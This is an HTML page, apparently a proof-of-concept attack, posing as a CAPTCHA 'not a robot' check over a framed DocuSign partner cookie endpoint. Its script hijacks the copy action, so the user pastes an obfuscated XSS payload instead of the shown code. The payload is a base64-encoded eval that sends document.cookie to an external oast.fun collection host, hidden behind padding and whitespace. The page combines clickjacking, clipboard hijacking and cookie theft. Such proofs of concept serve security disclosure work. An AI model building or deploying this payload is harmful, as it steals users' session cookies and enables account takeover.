

<html><head>
    <style>
      :root {
        --text-color-light: #000; /* Black text for light mode */
        --bg-color-light: #fff; /* White background for light mode */
        --text-color-dark: #fff; /* White text for dark mode */
        --bg-color-dark: #121212; /* Dark background for dark mode */
      }
        body {
          background-color: var(--bg-color-dark);
          color: var(--text-color-dark);
        }
      
      #drag {
                user-select: text; /* Allow text selection */
            }
    
    </style>
    </head>
    <body>
      <center><div id='drag' ><h3>Please verify that you're not a robot by copying the code AB2x7E and pasting it into the box that will appear after a few seconds and click on set cookie to save.</h3><div qjid="quickjack" style="overflow: hidden; width: 300px; height: 400px; position: relative;" id="cksl6">
        <iframe name="cksl7" src="https://partner.docusign.net/partners/msword/ribbon/setcookie"        style="border: 200pt none ; left: 0px; top: -9px; position: absolute; width: 3000px; height: 1000px;"  scrolling="no"></iframe></div><br>
    
      <script>
    
    var xss = `QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<img src=x onerror=eval(atob(\`dmFyIGltZyA9IG5ldyBJbWFnZSgpO2ltZy5zcmMgPSAnaHR0cDovL3ppdWdjbGh4bmlsa3p3c252cmhvNWxsbno1dXZvcGthMy5vYXN0LmZ1bi9jb2xsZWN0P2Nvb2tpZXM9JyArIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWUpOw==\`))>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              AB2x7E`;
    
    window.addEventListener("message",function(e){
        document.getElementsByTagName('iframe')[0].style="";
    })
    
    document.onreadystatechange = () => {
      if (document.readyState === 'complete') {
        var x = document.getElementById("drag");
     

    
    x.addEventListener('copy', (event) => {
                const selection = window.getSelection();
                    event.clipboardData.setData('text/plain', xss);
                    event.preventDefault();
            });
    
      }
    };
    </script>
    
    </html>
